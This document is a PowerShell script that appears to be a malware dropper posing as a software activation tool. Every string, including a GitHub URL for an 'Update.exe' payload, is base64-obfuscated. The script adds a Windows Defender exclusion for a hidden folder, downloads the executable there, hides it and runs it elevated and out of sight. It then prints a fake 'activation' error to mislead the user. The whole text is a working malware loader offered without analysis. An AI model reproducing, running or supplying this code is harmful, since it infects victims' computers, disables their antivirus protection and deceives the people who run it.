$downloadUrlB64 = "aHR0cHM6Ly9naXRodWIuY29tL1NVRzMyMS9naHlxdDIxL3JlbGVhc2VzL2Rvd25sb2FkL2hxd3R5NDEvVXBkYXRlLmV4ZQ=="
$updaterExeB64 = "dXBkYXRlci5leGU="
$hiddenAttrB64 = "SGlkZGVu"
$silentlyContinueB64 = "U2lsZW50bHljb250aW51ZQ=="
$stopActionB64 = "U3RvcA=="
$directoryB64 = "RGlyZWN0b3J5"
$runAsB64 = "UnVuQXM="

$downloadURL = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($downloadUrlB64))
$updaterExe = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($updaterExeB64))
$hiddenAttr = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hiddenAttrB64))
$silentlyContinue = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($silentlyContinueB64))
$stopAction = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($stopActionB64))
$directory = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($directoryB64))
$runAs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($runAsB64))

$hiddenFolder = Join-Path $env:LOCALAPPDATA ([System.Guid]::NewGuid().ToString())
New-Item -ItemType $directory -Path $hiddenFolder | Out-Null
$tempPath = Join-Path $hiddenFolder $updaterExe

function Add-Exclusion {
    param ([string]$Path)
    try {
        Add-MpPreference -ExclusionPath $Path -ErrorAction $silentlyContinue
    } catch {}
}

try {
    Add-Exclusion -Path $hiddenFolder
    $delay = Get-Random -Minimum 3 -Maximum 5
    Write-Host "Please wait for the process to be completed."
    Start-Sleep -Seconds $delay
    Invoke-WebRequest -Uri $downloadUrl -OutFile $tempPath -UseBasicParsing -ErrorAction Stop
    Set-ItemProperty -Path $hiddenFolder -Name Attributes -Value $hiddenAttr
    Set-ItemProperty -Path $tempPath -Name Attributes -Value $hiddenAttr
    Start-Process -FilePath $tempPath -WindowStyle Hidden -Verb $runAs -Wait
    Remove-Item $hiddenFolder -Recurse -Force
} catch {
    exit 1
} finally {
    Write-Host "Error during activation process. Try Again Later."
}